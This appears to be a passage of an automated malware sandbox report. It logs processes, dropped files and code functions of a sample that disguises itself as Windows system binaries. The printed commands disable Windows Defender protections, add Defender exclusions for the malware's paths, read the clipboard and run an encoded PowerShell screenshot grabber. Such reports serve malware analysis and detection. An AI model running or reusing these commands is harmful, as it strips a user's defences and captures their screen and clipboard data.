                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\UMMBDNEQBN.xlsx
                                  Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\NWTVCDUMOB.xlsx

                                  System Summary

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647
                                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: Commandline size = 3647
                                  Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C62B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,38_2_0000016716C62B2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C628C8 NtEnumerateValueKey,NtEnumerateValueKey,38_2_0000016716C628C8
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E8912B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,39_2_00000245E8912B2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E89128C8 NtEnumerateValueKey,NtEnumerateValueKey,39_2_00000245E89128C8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B47FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,13_2_00B47FD3
                                  Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP2406.tmp
                                  Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP3056.tmp
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B075C745_2_00007FF72B075C74
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B06FBD85_2_00007FF72B06FBD8
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0510005_2_00007FF72B051000
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B060C645_2_00007FF72B060C64
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0614845_2_00007FF72B061484
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B062CC45_2_00007FF72B062CC4
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B058B205_2_00007FF72B058B20
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B070B845_2_00007FF72B070B84
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0733BC5_2_00007FF72B0733BC
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0673F45_2_00007FF72B0673F4
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B078A385_2_00007FF72B078A38
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B060A605_2_00007FF72B060A60
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0612805_2_00007FF72B061280
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B067AAC5_2_00007FF72B067AAC
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B07518C5_2_00007FF72B07518C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0691B05_2_00007FF72B0691B0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B06D2005_2_00007FF72B06D200
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0650405_2_00007FF72B065040
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0610745_2_00007FF72B061074
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B06D8805_2_00007FF72B06D880
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0628C05_2_00007FF72B0628C0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0757285_2_00007FF72B075728
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B061F305_2_00007FF72B061F30
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B06FBD85_2_00007FF72B06FBD8
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B072F205_2_00007FF72B072F20
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B05979B5_2_00007FF72B05979B
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B059FCD5_2_00007FF72B059FCD
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B060E705_2_00007FF72B060E70
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B074F105_2_00007FF72B074F10
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B06CD6C5_2_00007FF72B06CD6C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0595FB5_2_00007FF72B0595FB
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeCode function: 6_2_00007FFD9B8813FB6_2_00007FFD9B8813FB
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeCode function: 6_2_00007FFD9B8813D36_2_00007FFD9B8813D3
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeCode function: 6_2_00007FFD9B88133C6_2_00007FFD9B88133C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B075C747_2_00007FF72B075C74
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0510007_2_00007FF72B051000
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B060C647_2_00007FF72B060C64
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0614847_2_00007FF72B061484
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B062CC47_2_00007FF72B062CC4
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B058B207_2_00007FF72B058B20
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B070B847_2_00007FF72B070B84
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0733BC7_2_00007FF72B0733BC
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0673F47_2_00007FF72B0673F4
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B06FBD87_2_00007FF72B06FBD8
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B078A387_2_00007FF72B078A38
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B060A607_2_00007FF72B060A60
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0612807_2_00007FF72B061280
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B067AAC7_2_00007FF72B067AAC
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B07518C7_2_00007FF72B07518C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0691B07_2_00007FF72B0691B0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B06D2007_2_00007FF72B06D200
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0650407_2_00007FF72B065040
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0610747_2_00007FF72B061074
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B06D8807_2_00007FF72B06D880
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0628C07_2_00007FF72B0628C0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0757287_2_00007FF72B075728
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B061F307_2_00007FF72B061F30
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B06FBD87_2_00007FF72B06FBD8
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B072F207_2_00007FF72B072F20
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B05979B7_2_00007FF72B05979B
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B059FCD7_2_00007FF72B059FCD
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B060E707_2_00007FF72B060E70
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B074F107_2_00007FF72B074F10
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B06CD6C7_2_00007FF72B06CD6C
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0595FB7_2_00007FF72B0595FB
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FFE0C0B75087_2_00007FFE0C0B7508
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B4990613_2_00B49906
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B4F96313_2_00B4F963
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5EA0713_2_00B5EA07
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B58C7E13_2_00B58C7E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B560F713_2_00B560F7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B7404413_2_00B74044
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5212513_2_00B52125
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5911113_2_00B59111
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B582D013_2_00B582D0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B4E39413_2_00B4E394
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5147613_2_00B51476
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5644513_2_00B56445
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6773813_2_00B67738
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5976F13_2_00B5976F
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6796713_2_00B67967
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5094913_2_00B50949
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B43AB713_2_00B43AB7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6FA9013_2_00B6FA90
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B44C6E13_2_00B44C6E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B55E8613_2_00B55E86
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B50FAC13_2_00B50FAC
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B42FCB13_2_00B42FCB
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B6FF3E13_2_00B6FF3E
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7F4C15_2_00007FF6D55E7F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55D796015_2_00007FF6D55D7960
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F647015_2_00007FF6D55F6470
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F73BC15_2_00007FF6D55F73BC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F6E7015_2_00007FF6D55F6E70
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E2E5015_2_00007FF6D55E2E50
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F66EC15_2_00007FF6D55F66EC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7D9815_2_00007FF6D55E7D98
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55EE5B015_2_00007FF6D55EE5B0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E1D9015_2_00007FF6D55E1D90
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7F4C15_2_00007FF6D55E7F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F103815_2_00007FF6D55F1038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55EE11C15_2_00007FF6D55EE11C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55FA0F815_2_00007FF6D55FA0F8
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55D90D015_2_00007FF6D55D90D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E1F9415_2_00007FF6D55E1F94
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55D1F5015_2_00007FF6D55D1F50
